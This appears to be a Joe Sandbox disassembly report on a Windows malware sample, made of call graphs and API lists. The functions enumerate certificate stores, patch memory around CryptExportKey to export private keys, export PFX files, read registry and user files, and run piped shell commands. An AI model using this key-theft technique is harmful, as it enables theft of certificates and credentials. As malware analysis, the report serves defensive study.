7ff6aab46054 4703 7ff6aab46077 4702->4703 4703->4703 4704 7ff6aab47234 5 API calls 4703->4704 4705 7ff6aab460f1 4704->4705 4706 7ff6aab47234 5 API calls 4705->4706 4707 7ff6aab46110 4706->4707 4708 7ff6aab47234 5 API calls 4707->4708 4709 7ff6aab4612f 4708->4709 4710 7ff6aab47234 5 API calls 4709->4710 4711 7ff6aab4619e 4710->4711 4712 7ff6aab47234 5 API calls 4711->4712 4713 7ff6aab461bd 4712->4713 4714 7ff6aab472d4 5 API calls 4713->4714 4715 7ff6aab461dc 4714->4715 4716 7ff6aab4c390 4717 7ff6aab4c3a3 4716->4717 4718 7ff6aab41990 4 API calls 4717->4718 4719 7ff6aab4c3ae 4718->4719 4734 7ff6aab4c55c 4719->4734 4818 7ff6aab4e958 4734->4818 4839 7ff6aab425dc GetProcessHeap HeapAlloc 4818->4839 4927 7ff6aab4ecd0 4928 7ff6aab4ecfe 4927->4928 4930 7ff6aab4ee1b 4927->4930 4928->4930 4941 7ff6aab425dc GetProcessHeap HeapAlloc 4928->4941 4942 7ff6aab46758 4943 7ff6aab4677b 4942->4943 4943->4943 4944 7ff6aab47234 5 API calls 4943->4944 4945 7ff6aab467ea 4944->4945 4946 7ff6aab47234 5 API calls 4945->4946 4947 7ff6aab46859 4946->4947 4948 7ff6aab47234 5 API calls 4947->4948 4949 7ff6aab46878 4948->4949 4950 7ff6aab47234 5 API calls 4949->4950 4951 7ff6aab46897 4950->4951 4952 7ff6aab47234 5 API calls 4951->4952 4953 7ff6aab468b6 4952->4953 4954 7ff6aab4ec1c 4955 7ff6aab4ec47 4954->4955 4956 7ff6aab4ec33 4954->4956 4960 7ff6aab425dc GetProcessHeap HeapAlloc 4956->4960 4085 7ff6aab42b1c 4086 7ff6aab41990 4 API calls 4085->4086 4087 7ff6aab42b42 4086->4087 4088 7ff6aab419e4 4 API calls 4087->4088 4089 7ff6aab42b4d 4088->4089 4090 7ff6aab41990 4 API calls 4089->4090 4091 7ff6aab42b5c 4090->4091 4092 7ff6aab41990 4 API calls 4091->4092 4093 7ff6aab42b6b CertEnumSystemStore 4092->4093 4094 7ff6aab41990 4 API calls 4093->4094 4095 7ff6aab42b94 4094->4095 4976 7ff6aab4639c 4977 7ff6aab463c7 4976->4977 4977->4977 4978 7ff6aab47234 5 API calls 4977->4978 4979 7ff6aab46449 4978->4979 4980 7ff6aab47234 5 API calls 4979->4980 4981 7ff6aab46468 4980->4981 4982 7ff6aab47234 5 API calls 4981->4982 4983 7ff6aab46487 4982->4983 4984 7ff6aab47234 5 API calls 4983->4984 4985 7ff6aab464ed 4984->4985 4986 7ff6aab47234 5 API calls 4985->4986 4987 7ff6aab4650c 4986->4987 4988 7ff6aab47234 5 API calls 4987->4988 4989 7ff6aab4652b 4988->4989 5014 7ff6aab47298 4989->5014 4991 7ff6aab4654a 4992 7ff6aab47234 5 API calls 4991->4992 4993 7ff6aab46569 4992->4993 4994 7ff6aab47234 5 API calls 4993->4994 4995 7ff6aab46588 4994->4995 4996 7ff6aab47234 5 API calls 4995->4996 4997 7ff6aab465f7 4996->4997 4998 7ff6aab47234 5 API calls 4997->4998 4999 7ff6aab46616 4998->4999 5000 7ff6aab472d4 5 API calls 4999->5000 5001 7ff6aab46635 5000->5001 5002 7ff6aab472d4 5 API calls 5001->5002 5003 7ff6aab46654 5002->5003 5004 7ff6aab472d4 5 API calls 5003->5004 5005 7ff6aab466b7 5004->5005 5006 7ff6aab47234 5 API calls 5005->5006 5007 7ff6aab466d6 5006->5007 5008 7ff6aab47234 5 API calls 5007->5008 5009 7ff6aab466f5 5008->5009 5010 7ff6aab47234 5 API calls 5009->5010 5011 7ff6aab46714 5010->5011 5012 7ff6aab47234 5 API calls 5011->5012 5013 7ff6aab46733 5012->5013 5015 7ff6aab47310 5 API calls 5014->5015 5016 7ff6aab472b5 5015->5016 5017 7ff6aab472ce 5016->5017 5018 7ff6aab41a70 5 API calls 5016->5018 5017->4991 5018->5017 5019 7ff6aab4e618 lstrcpyW PathAppendW 5020 7ff6aab4e658 5019->5020 5021 7ff6aab4cd0c 6 API calls 5020->5021 5023 7ff6aab4e674 5021->5023 5022 7ff6aab4e6df 5023->5022 5024 7ff6aab41990 4 API calls 5023->5024 5025 7ff6aab4e690 5024->5025 5026 7ff6aab419e4 4 API calls 5025->5026 5027 7ff6aab4e69b 5026->5027 5028 7ff6aab41990 4 API calls 5027->5028 5029 7ff6aab4e6b3 5028->5029 5030 7ff6aab419e4 4 API calls 5029->5030 5031 7ff6aab4e6c3 5030->5031 5032 7ff6aab41990 4 API calls 5031->5032 5033 7ff6aab4e6d2 5032->5033 5034 7ff6aab425b4 2 API calls 5033->5034 5034->5022 5035 7ff6aab4dc20 5036 7ff6aab4dc74 5035->5036 5037 7ff6aab41990 4 API calls 5036->5037 5038 7ff6aab4dcaa 5037->5038 5039 7ff6aab41990 4 API calls 5038->5039 5040 7ff6aab4dcc1 5039->5040 5163 7ff6aab4cc08 RegOpenKeyExW 5040->5163 5042 7ff6aab4dce1 5043 7ff6aab41990 4 API calls 5042->5043 5044 7ff6aab4dd44 5043->5044 5045 7ff6aab41990 4 API calls 5044->5045 5046 7ff6aab4dd5b 5045->5046 5047 7ff6aab4cd0c 6 API calls 5046->5047 5048 7ff6aab4dd80 5047->5048 5049 7ff6aab4dec7 5048->5049 5051 7ff6aab4dd94 PathCombineW PathFileExistsW 5048->5051 5050 7ff6aab41990 4 API calls 5049->5050 5052 7ff6aab4ded6 5050->5052 5053 7ff6aab4ddba PathQuoteSpacesW 5051->5053 5054 7ff6aab4deb4 5051->5054 5057 7ff6aab41990 4 API calls 5052->5057 5169 7ff6aab4d004 5053->5169 5055 7ff6aab425b4 2 API calls 5054->5055 5055->5049 5059 7ff6aab4deed 5057->5059 5058 7ff6aab4ddd0 lstrcatW 5171 7ff6aab4e8b8 5058->5171 5061 7ff6aab4cc08 4 API calls 5059->5061 5064 7ff6aab4df06 5061->5064 5063 7ff6aab49644 2 API calls 5066 7ff6aab4ddfa 5063->5066 5065 7ff6aab41990 4 API calls 5064->5065 5067 7ff6aab4df22 5065->5067 5066->5066 5069 7ff6aab4900c 16 API calls 5066->5069 5068 7ff6aab41990 4 API calls 5067->5068 5070 7ff6aab4df31 5068->5070 5071 7ff6aab4de4f 5069->5071 5073 7ff6aab41990 4 API calls 5070->5073 5072 7ff6aab495a0 8 API calls 5071->5072 5076 7ff6aab4de95 5071->5076 5074 7ff6aab4de64 5072->5074 5075 7ff6aab4df48 5073->5075 5077 7ff6aab4de8b 5074->5077 5079 7ff6aab497dc 16 API calls 5074->5079 5080 7ff6aab4df54 GetEnvironmentVariableW 5075->5080 5083 7ff6aab425b4 2 API calls 5076->5083 5078 7ff6aab49478 13 API calls 5077->5078 5078->5076 5084 7ff6aab4de78 5079->5084 5081 7ff6aab4e1fb 5080->5081 5082 7ff6aab4df7d 5080->5082 5085 7ff6aab41990 4 API calls 5081->5085 5086 7ff6aab4df89 PathAppendW PathFileExistsW 5082->5086 5083->5054 5084->5077 5088 7ff6aab41990 4 API calls 5084->5088 5087 7ff6aab4e20a 5085->5087 5086->5081 5089 7ff6aab4dfae CreateFileW 5086->5089 5092 7ff6aab41990 4 API calls 5087->5092 5088->5077 5089->5081 5090 7ff6aab4dfe3 GetFileSize 5089->5090 5178 7ff6aab425dc GetProcessHeap HeapAlloc 5090->5178 5094 7ff6aab4e221 5092->5094 5097 7ff6aab4cc08 4 API calls 5094->5097 5099 7ff6aab4e23e 5097->5099 5101 7ff6aab41990 4 API calls 5099->5101 5103 7ff6aab4e25a 5101->5103 5106 7ff6aab41990 4 API calls 5103->5106 5109 7ff6aab4e271 5106->5109 5112 7ff6aab4e27d GetEnvironmentVariableW 5109->5112 5114 7ff6aab4e390 5112->5114 5115 7ff6aab4e2a0 5112->5115 5116 7ff6aab41990 4 API calls 5114->5116 5119 7ff6aab4e2ac PathAppendW PathFileExistsW 5115->5119 5120 7ff6aab4e39f 5116->5120 5119->5114 5124 7ff6aab4e2d1 CreateFileW 5119->5124 5122 7ff6aab41990 4 API calls 5120->5122 5126 7ff6aab4e3ae 5122->5126 5124->5114 5129 7ff6aab4e306 GetFileSize 5124->5129 5179 7ff6aab42588 GetProcessHeap HeapAlloc 5129->5179 5164 7ff6aab4cceb 5163->5164 5165 7ff6aab4cc5b RegEnumKeyExW 5163->5165 5164->5042 5166 7ff6aab4cce0 RegCloseKey 5165->5166 5167 7ff6aab4cc91 RegEnumKeyExW 5165->5167 5166->5164 5167->5166 5170 7ff6aab4d05f 5169->5170 5170->5058 5172 7ff6aab4e7e0 2 API calls 5171->5172 5173 7ff6aab4e8d7 5172->5173 5180 7ff6aab4e764 5173->5180 5176 7ff6aab4e6f0 4 API calls 5177 7ff6aab4dded 5176->5177 5177->5063 5181 7ff6aab4e7ab 5180->5181 5182 7ff6aab4e77f 5180->5182 5181->5176 5182->5181 5183 7ff6aab4e6f0 4 API calls 5182->5183 5183->5182 3952 7ff6aab41968 3955 7ff6aab425dc GetProcessHeap HeapAlloc 3952->3955 4096 7ff6aab42bac 4097 7ff6aab42bc5 4096->4097 4098 7ff6aab41990 4 API calls 4097->4098 4099 7ff6aab42bdc 4098->4099 4100 7ff6aab419e4 4 API calls 4099->4100 4101 7ff6aab42bec 4100->4101 4102 7ff6aab41990 4 API calls 4101->4102 4103 7ff6aab42c00 CertOpenStore 4102->4103 4104 7ff6aab42c24 4103->4104 4108 7ff6aab42c48 4103->4108 4105 7ff6aab41990 4 API calls 4104->4105 4106 7ff6aab42c38 4105->4106 4111 7ff6aab42d5c CertEnumCertificatesInStore 4106->4111 4108->4108 4109 7ff6aab41990 4 API calls 4108->4109 4110 7ff6aab42cbd CertCloseStore 4109->4110 4112 7ff6aab4319c 4111->4112 4118 7ff6aab42daa 4111->4118 4113 7ff6aab431ad 4112->4113 4115 7ff6aab425b4 2 API calls 4112->4115 4113->4108 4114 7ff6aab42db0 CertGetNameStringW 4114->4118 4115->4113 4116 7ff6aab41990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4116->4118 4117 7ff6aab419e4 4 API calls 4117->4118 4118->4114 4118->4116 4118->4117 4119 7ff6aab41990 4 API calls 4118->4119 4120 7ff6aab42e8e CertNameToStrW 4119->4120 4122 7ff6aab42eca 4120->4122 4121 7ff6aab41990 4 API calls 4121->4122 4122->4121 4123 7ff6aab419e4 4 API calls 4122->4123 4124 7ff6aab41990 4 API calls 4122->4124 4123->4122 4125 7ff6aab42eec CertNameToStrW 4124->4125 4127 7ff6aab42f1c 4125->4127 4126 7ff6aab41990 4 API calls 4126->4127 4127->4126 4128 7ff6aab419e4 4 API calls 4127->4128 4129 7ff6aab41990 4 API calls 4127->4129 4128->4127 4130 7ff6aab42f3e FileTimeToSystemTime 4129->4130 4131 7ff6aab42f84 4130->4131 4132 7ff6aab41a70 5 API calls 4131->4132 4133 7ff6aab42faf FileTimeToSystemTime 4132->4133 4137 7ff6aab42ffa 4133->4137 4135 7ff6aab41a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4135->4137 4137->4135 4138 7ff6aab41990 4 API calls 4137->4138 4144 7ff6aab4308d 4137->4144 4146 7ff6aab479f0 4137->4146 4150 7ff6aab425b4 4137->4150 4140 7ff6aab4316e CertEnumCertificatesInStore 4138->4140 4140->4112 4140->4114 4142 7ff6aab425b4 2 API calls 4142->4144 4143 7ff6aab41990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4143->4144 4144->4137 4144->4142 4144->4143 4145 7ff6aab425b4 2 API calls 4144->4145 4153 7ff6aab43220 CertGetCertificateContextProperty 4144->4153 4180 7ff6aab4a78c 4144->4180 4145->4137 4147 7ff6aab47a0d 4146->4147 4149 7ff6aab47a09 4146->4149 4184 7ff6aab425dc GetProcessHeap HeapAlloc 4147->4184 4149->4137 4151 7ff6aab425b9 GetProcessHeap RtlFreeHeap 4150->4151 4152 7ff6aab425da 4150->4152 4151->4152 4152->4137 4154 7ff6aab4348c 4153->4154 4155 7ff6aab4326c CryptAcquireCertificatePrivateKey 4153->4155 4154->4144 4155->4154 4156 7ff6aab4329b 4155->4156 4157 7ff6aab434a9 OpenSCManagerA 4156->4157 4158 7ff6aab432b4 CryptGetUserKey 4156->4158 4159 7ff6aab434dd 4157->4159 4158->4154 4160 7ff6aab432c9 4158->4160 4162 7ff6aab434fb 6 API calls 4159->4162 4185 7ff6aab436f0 4160->4185 4164 7ff6aab435d1 4162->4164 4163 7ff6aab432e5 4163->4154 4166 7ff6aab43333 LoadLibraryA 4163->4166 4195 7ff6aab425dc GetProcessHeap HeapAlloc 4164->4195 4168 7ff6aab4335f 4166->4168 4169 7ff6aab4337a GetProcAddress VirtualProtect 4168->4169 4171 7ff6aab433c1 4169->4171 4170 7ff6aab4361d 4172 7ff6aab43652 CertOpenStore CertAddCertificateLinkToStore CertSetCertificateContextProperty PFXExportCertStoreEx 4170->4172 4175 7ff6aab433d0 VirtualProtect CryptExportKey 4171->4175 4196 7ff6aab425dc GetProcessHeap HeapAlloc 4172->4196 4175->4154 4176 7ff6aab4340e VirtualProtect 4175->4176 4193 7ff6aab4262c 4176->4193 4179 7ff6aab43463 CryptImportKey 4179->4154 4179->4170 4181 7ff6aab4a7b4 4180->4181 4198 7ff6aab425dc GetProcessHeap HeapAlloc 4181->4198 4186 7ff6aab43728 CryptExportKey 4185->4186 4189 7ff6aab4370f 4185->4189 4187 7ff6aab437ac 4186->4187 4191 7ff6aab4374e 4186->4191 4197 7ff6aab425dc GetProcessHeap HeapAlloc 4187->4197 4189->4186 4190 7ff6aab437a8 4190->4163 4191->4190 4192 7ff6aab43766 CryptExportKey 4191->4192 4192->4187 4192->4190 4194 7ff6aab42634 VirtualProtect CryptAcquireContextA 4193->4194 4194->4154 4194->4179 5190 7ff6aab469ec 5191 7ff6aab46a0f 5190->5191 5191->5191 5192 7ff6aab47234 5 API calls 5191->5192 5193 7ff6aab46a7e 5192->5193 5193->5193 5194 7ff6aab47234 5 API calls 5193->5194 5195 7ff6aab46aed 5194->5195 5196 7ff6aab472d4 5 API calls 5195->5196 5197 7ff6aab46b0c 5196->5197 5198 7ff6aab45fac 5199 7ff6aab45fc2 5198->5199 5200 7ff6aab47234 5 API calls 5199->5200 5201 7ff6aab45ff0 5200->5201 5202 7ff6aab4e4e8 lstrcpyW PathAppendW 5203 7ff6aab4e534 5202->5203 5204 7ff6aab4cd0c 6 API calls 5203->5204 5206 7ff6aab4e54f 5204->5206 5205 7ff6aab4e602 5206->5205 5207 7ff6aab41990 4 API calls 5206->5207 5208 7ff6aab4e56e 5207->5208 5209 7ff6aab419e4 4 API calls 5208->5209 5210 7ff6aab4e579 5209->5210 5211 7ff6aab41990 4 API calls 5210->5211 5212 7ff6aab4e590 5211->5212 5213 7ff6aab419e4 4 API calls 5212->5213 5214 7ff6aab4e59f 5213->5214 5214->5214 5215 7ff6aab41990 4 API calls 5214->5215 5216 7ff6aab4e5f6 5215->5216 5217 7ff6aab425b4 2 API calls 5216->5217 5217->5205 5225 7ff6aab46d30 5226 7ff6aab46d51 5225->5226 5227 7ff6aab47234 5 API calls 5226->5227 5228 7ff6aab46dc0 5227->5228 5229 7ff6aab47234 5 API calls 5228->5229 5230 7ff6aab46e2d 5229->5230 5231 7ff6aab472d4 5 API calls 5230->5231 5232 7ff6aab46e4c 5231->5232 5241 7ff6aab471ec 5232->5241 5234 7ff6aab46e6b 5235 7ff6aab471ec 5 API calls 5234->5235 5236 7ff6aab46edd 5235->5236 5237 7ff6aab47234 5 API calls 5236->5237 5238 7ff6aab46f42 5237->5238 5239 7ff6aab47234 5 API calls 5238->5239 5240 7ff6aab46fa0 5239->5240 5242 7ff6aab47310 5 API calls 5241->5242 5243 7ff6aab47209 5242->5243 5244 7ff6aab4722e 5243->5244 5245 7ff6aab41990 4 API calls 5243->5245 5244->5234 5245->5244 5246 7ff6aab46270 5247 7ff6aab46293 5246->5247 5248 7ff6aab47234 5 API calls 5247->5248 5249 7ff6aab46302 5248->5249 5250 7ff6aab47234 5 API calls 5249->5250 5251 7ff6aab46321 5250->5251 5252 7ff6aab47234 5 API calls 5251->5252 5253 7ff6aab46340 5252->5253 5254 7ff6aab47234 5 API calls 5253->5254 5255 7ff6aab4635f 5254->5255 5256 7ff6aab47234 5 API calls 5255->5256 5257 7ff6aab4637e 5256->5257

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 129 7ff6aab49224-7ff6aab49306 GetSystemTimeAsFileTime call 7ff6aab49a20 * 3 call 7ff6aab49a98 call 7ff6aab42698 call 7ff6aab425dc call 7ff6aab47b34 * 4 call 7ff6aab4971c call 7ff6aab425b4 154 7ff6aab49309-7ff6aab49317 129->154 155 7ff6aab49329-7ff6aab49330 154->155 156 7ff6aab49319-7ff6aab4931c call 7ff6aab4968c 154->156 158 7ff6aab4938c-7ff6aab49393 155->158 159 7ff6aab49332-7ff6aab49335 155->159 162 7ff6aab49321-7ff6aab49323 156->162 160 7ff6aab493a2-7ff6aab493b6 WaitForSingleObject 158->160 161 7ff6aab49395-7ff6aab49399 call 7ff6aab4968c 158->161 159->158 163 7ff6aab49337-7ff6aab49351 159->163 167 7ff6aab493b8-7ff6aab493ca GetSystemTimeAsFileTime 160->167 168 7ff6aab493f5 160->168 172 7ff6aab4939e-7ff6aab493a0 161->172 162->155 162->168 164 7ff6aab49382-7ff6aab49386 163->164 165 7ff6aab49353-7ff6aab49365 call 7ff6aab47b50 163->165 164->158 171 7ff6aab49418-7ff6aab4942c WaitForSingleObject 164->171 177 7ff6aab49367-7ff6aab4936e 165->177 178 7ff6aab49374-7ff6aab49380 165->178 167->154 173 7ff6aab493d0-7ff6aab493e3 call 7ff6aab49a98 167->173 170 7ff6aab493f7-7ff6aab49417 168->170 171->168 175 7ff6aab4942e-7ff6aab49434 171->175 172->160 172->168 173->154 185 7ff6aab493e9-7ff6aab493ef TerminateProcess 173->185 179 7ff6aab49436-7ff6aab49439 call 7ff6aab4968c 175->179 180 7ff6aab49442-7ff6aab49449 175->180 177->171 177->178 178->164 178->165 186 7ff6aab4943e-7ff6aab49440 179->186 183 7ff6aab4944b-7ff6aab4944f call 7ff6aab4968c 180->183 184 7ff6aab49458-7ff6aab49468 GetExitCodeProcess 180->184 190 7ff6aab49454-7ff6aab49456 183->190 188 7ff6aab4946a-7ff6aab49471 184->188 189 7ff6aab49473-7ff6aab49475 184->189 185->168 186->168 186->180 188->168 188->189 189->170 190->168 190->184
                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6AAB4924D
                                                                          • Part of subcall function 00007FF6AAB425DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6AAB41985,?,?,?,00007FF6AAB4155F), ref: 00007FF6AAB425E5
                                                                          • Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
                                                                          • Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF
                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6AAB493AB
                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6AAB493C0
                                                                        • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6AAB493EF
                                                                          • Part of subcall function 00007FF6AAB4968C: PeekNamedPipe.KERNELBASE ref: 00007FF6AAB496B8
                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF6AAB49421
                                                                        • GetExitCodeProcess.KERNELBASE ref: 00007FF6AAB49460
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
                                                                        • String ID: & echo
                                                                        • API String ID: 2711250446-3491486023
                                                                        • Opcode ID: 2d6ebe6036ec555fde6b5a2d1141e9a7e3c1177d779b4c0a60f4d7d1f5e2e413
                                                                        • Instruction ID: f62bdc682ff25e794b630a2abd1abcc0a4b81d4813ab5be793b1b3aa1f0a9da8
                                                                        • Opcode Fuzzy Hash: 2d6ebe6036ec555fde6b5a2d1141e9a7e3c1177d779b4c0a60f4d7d1f5e2e413
                                                                        • Instruction Fuzzy Hash: 11512225B0A642CBEE20DB52E5552BA6391FF87B80F4484B3DA4EC7B95DE3DE446C340

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize$CreateInstanceSecurity
                                                                        • String ID:
                                                                        • API String ID: 89549506-0
                                                                        • Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                        • Instruction ID: 72c0818a9fb8d75cd6e812b91a27cb889b515acfbf7fff620f8e9a167f7d72ed
                                                                        • Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                        • Instruction Fuzzy Hash: D5118C73A14640DAF3109F61E8593AE7774F74470DF508219DA4A5A958CF3CD245CB84

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 682 7ff6aab425b4-7ff6aab425b7 683 7ff6aab425b9-7ff6aab425d9 GetProcessHeap RtlFreeHeap 682->683 684 7ff6aab425da 682->684 683->684
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$FreeProcess
                                                                        • String ID:
                                                                        • API String ID: 3859560861-0
                                                                        • Opcode ID: 3522ce1484baedbfe33511e301451e993b837232db68b9421e2362fa418d2ba1
                                                                        • Instruction ID: 3acb3838f0b1e67d6d3689ee24a57af2df5b905666e4f048503c6c5fb0170e82
                                                                        • Opcode Fuzzy Hash: 3522ce1484baedbfe33511e301451e993b837232db68b9421e2362fa418d2ba1
                                                                        • Instruction Fuzzy Hash: 77C01254E17603C2FE18A7E3741407142516F9AF85B0880B1CE0B857619D2C51D65600

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6AAB42D90
                                                                        • CertGetNameStringW.CRYPT32 ref: 00007FF6AAB42DD3
                                                                        • CertNameToStrW.CRYPT32 ref: 00007FF6AAB42EB8
                                                                        • CertNameToStrW.CRYPT32 ref: 00007FF6AAB42F0A
                                                                        • FileTimeToSystemTime.KERNEL32 ref: 00007FF6AAB42F4B
                                                                        • FileTimeToSystemTime.KERNEL32 ref: 00007FF6AAB42FC1
                                                                          • Part of subcall function 00007FF6AAB41A70: wvsprintfW.USER32 ref: 00007FF6AAB41AA9
                                                                          • Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
                                                                          • Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF
                                                                        • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6AAB43178
                                                                          • Part of subcall function 00007FF6AAB43220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB4325E
                                                                          • Part of subcall function 00007FF6AAB43220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF6AAB4328D
                                                                          • Part of subcall function 00007FF6AAB43220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB432BB
                                                                          • Part of subcall function 00007FF6AAB43220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB43336
                                                                          • Part of subcall function 00007FF6AAB43220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB43380
                                                                          • Part of subcall function 00007FF6AAB43220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AAB433AC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
                                                                        • String ID: 1.2.840.113549
                                                                        • API String ID: 2787208766-3888290641
                                                                        • Opcode ID: b2105952aae41a20548f7ce3b0531247084a8ab1830502872cffbf9449bb2f77
                                                                        • Instruction ID: adab070c3fc9f6f8a07725c5475ab880b89e93471de0b4bfc16cfbab1e6d244b
                                                                        • Opcode Fuzzy Hash: b2105952aae41a20548f7ce3b0531247084a8ab1830502872cffbf9449bb2f77
                                                                        • Instruction Fuzzy Hash: 4DB1B762A19642C6E750DF52E4512BEA761FB86BC4F000076EE8E47B69DF3CD146CB40

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: CreateErrorLast$Pipe$CloseHandleProcess
                                                                        • String ID:
                                                                        • API String ID: 2620922840-0
                                                                        • Opcode ID: 2bf46aedc423b534a393a5c4b1443350d03c6c4fe38568a13f8f064401dd7188
                                                                        • Instruction ID: e29c6d8d790d56cfea97b6b78ea696a4a3ed7c5eb2e75470fdbb20b4d1b428eb
                                                                        • Opcode Fuzzy Hash: 2bf46aedc423b534a393a5c4b1443350d03c6c4fe38568a13f8f064401dd7188
